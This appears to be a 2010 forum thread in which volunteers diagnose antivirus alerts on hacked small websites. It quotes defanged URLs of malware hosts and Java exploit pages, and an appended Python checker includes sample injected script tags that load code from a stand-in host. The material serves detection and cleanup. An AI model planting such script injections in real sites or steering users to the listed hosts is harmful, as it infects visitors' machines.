Report 2010-07-03 23:05:02 (GMT 1)
Website happytailspetservices.com
Domain Hash 0455f15839fb3e0e8f659e13e4975e58
IP Address 173.201.137.68
IP Hostname ip-173-201-137-68.ip.secureserver.net
IP Country US (United States)
AS Number 26496
AS Name PAH-INC - GoDaddy.com, Inc.
Detections 1 / 17 (6 %)
Status SUSPICIOUS Scanning site with: Finjan DETECTED
There is a script tag outside the closing html tag, a standards no-no and highly suspect. It is trying to run a JavaScript file from another site (which has nothing to do with Yahoo), see image2. This is a malicious site which would be blocked by avast (image3) and Firefox (image4); also see https://safeweb.norton.com/report/show?name=blackhulu.com.
So it looks like the happytailspetservices.com site has been hacked and the detection is most certainly correct.
Yes, it is easy to ignore what is in front of your nose when the alert is apparently coming from a parent site ;D
@ cinvan1121
Now you have to contact the hacked site, or check it out if it is within your control, and remove the inserted script tag. More importantly you need to close whatever vulnerability has allowed the site to be exploited/hacked.
That is why Unmasked Parasites is such a good resource, because it gives you all redirects and subdomains and links, and you have to check these also separately. Scanners that just take the main domain fail to get all the malcode that way: happytailspetservices.com - but the infection and the suspicious script is: assolkh.blackhulu.com suspicious - displaying 1 of 1
* <Script> link - htxp://assolkh.blackhulu.com:8080/Yahoo.js
Malicious software includes 31 exploits, 13 trojans, 1 scripting exploits.
Threat Name: Bloodhound.Exploit.292
Location: htxp://assolkh.blackhulu.com:8080/Applet1.html
This site was hosted on 1 network including AS7795 (NTELOSINC).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, blackhulu.com appeared to function as an intermediary for the infection of 12 sites including techmyhelp.com/, skyventure.com.my/, setdaccio.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 74 domains, including raidmax.com/, thavage.com/, vestonkhuongduy.com/,
polonus
P.S. Example of this iFrame injection here: htxp://jsunpack.jeek.org/dec/go?report=63af26934bd3bb5f3f7df4e128e4a7ea4b8eb332 (Open with NS active, malicious)
What is it? It comes courtesy of a java deployment toolkit - example:
2010/05/15_21:10 yoursoap.ru:8080/Applet1html 174.137.179.244 digit-colo.amsnl.webaircom. exploit for java deployment toolkit veerATmaillife.ru 36057
will only attempt to infect Internet Explorer and Google Chrome users, so use Fx with NS and RP active!
The final target and what malware might be on it is immaterial as avast doesn’t allow it to get anywhere near it.
The problem in this case is that the OP is concerned about the fact that avast alerts on their site happytailstucson.com, because a cross-site link where data is imported from happytailspetservices.com has been hacked, and it is that which avast is alerting on, because it has been hacked with the insertion of the script tag.
We don’t really need to know what is on blackhulu.com as that could well change at the drop of a hat. We are trying to help the OP to resolve their problem which has nothing to do with the payload at blackhulu.com; that problem is the hacking of happytailspetservices.com.
If that problem is resolved then the final destination is immaterial; we don’t need to go to that depth to help the OP to resolve their problem other than say the detection is good.
The site has been hacked via a java exploit, so check to have the latest java there. It might well be that thanks to avast users never came even close to the malware (if there was an active payload at the time), because they were disconnected or alerted well in advance. Neither malcode nor exploits belong on a reputable website; they should be cleansed.
We are having a similar issue with website wXw.osundefender.org, avast seems to be detecting virus HTML:Script-Inf. I have run the website through a number of online scanners (Dr. Web, NovirusThanksYou) and none seem to detect this… Could this be a case of Avast blacklisting the website? Please advise…
The CSS file that is called from the index page appears to have been hacked (see image1); apart from CSS instructions there is a script tag to an off-site URL, which is suspect (image2). The same script tag is also at the end of the index.php page, causing avast to alert on that too (image3).
So it isn’t only avast detecting this, though there are actually very few even looking for this type of thing much less detect it.
The site that the script tag tries to run is one that avast considers a malicious site (image4); avast isn’t the only one that considers this Russian site malicious, http://www.mywot.com/en/scorecard/holasionweb.com.
Please ‘modify’ your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.
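As an added example (not code from the thread or from avast), a small Python checker for the two injection patterns described in this thread: a script tag placed after the closing html tag, and a script tag sitting inside a stylesheet, with any script source pointing off-site flagged as well. The sample page, the sample stylesheet and the host example-bad.invalid are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: the legitimate script is inside <body>, the
# injected one was appended after </html>, as described in the thread.
SAMPLE_HTML = """<html><head><link rel="stylesheet" href="style.css"></head>
<body><p>Welcome to our pet services.</p>
<script src="/js/site.js"></script></body></html>
<script src="http://example-bad.invalid:8080/Yahoo.js"></script>"""

# Constructed sample stylesheet with a script tag appended to it.
SAMPLE_CSS = """body { font-family: sans-serif; }
.hidden { display: none; }
<script src="http://example-bad.invalid/x.js"></script>"""

SCRIPT_RE = re.compile(r'<script\b[^>]*>', re.IGNORECASE)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def script_findings(text, site_host, kind="html"):
    """Return (reason, src) tuples for suspicious script tags in text.

    kind is "html" for a page or "css" for a stylesheet; site_host is the
    hostname the content belongs to, so off-site sources can be spotted.
    """
    findings = []
    end_html = None
    if kind == "html":
        m = re.search(r'</html\s*>', text, re.IGNORECASE)
        end_html = m.end() if m else None
    for tag in SCRIPT_RE.finditer(text):
        src_m = SRC_RE.search(tag.group(0))
        src = src_m.group(1) if src_m else ""
        # Relative sources have no scheme and therefore no foreign host.
        host = urlparse(src).hostname if "://" in src else None
        if kind == "css":
            findings.append(("script tag inside stylesheet", src))
        elif end_html is not None and tag.start() >= end_html:
            findings.append(("script tag after </html>", src))
        if host and host != site_host and not host.endswith("." + site_host):
            findings.append(("off-site script source", src))
    return findings


def scan_site(html, css, site_host):
    """Scan a page and its stylesheet together and return all findings."""
    return script_findings(html, site_host) + script_findings(css, site_host, "css")
```

Legitimate CDN-hosted scripts will also be reported as off-site; the point is to surface every external script for a manual look, not to judge it.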
Well the sublink is there on unmasked parasites:
The last time Google visited this site was on 2010-05-21, and the last time suspicious content was found on this site was on 2010-05-20.
Malicious software includes 109 scripting exploits, 1 trojan.
This site was hosted on 4 network(s) including AS50108 (KALUGANET), AS16276 (OVH), AS2588 (LATNETSERVISS).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, holasionweb.com appeared to function as an intermediary for the infection of 3 sites including ffl.org/, cosmicbooknews.com/, 365dailynews.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software and it infected 35 domains, including moomha.com/, venciclopedia.com/, pattonwebz.com/. (the last one was reported by me on the avast forums - pol)
Avast free antivirus 5 gives HTML:Script-inf virus alert for the webpage: wxw.sajtorandevu.hu
I had it checked with the designer but there is no code that is wrong there, and we can not figure out the problem. How could I know what this script is that might bother Avast?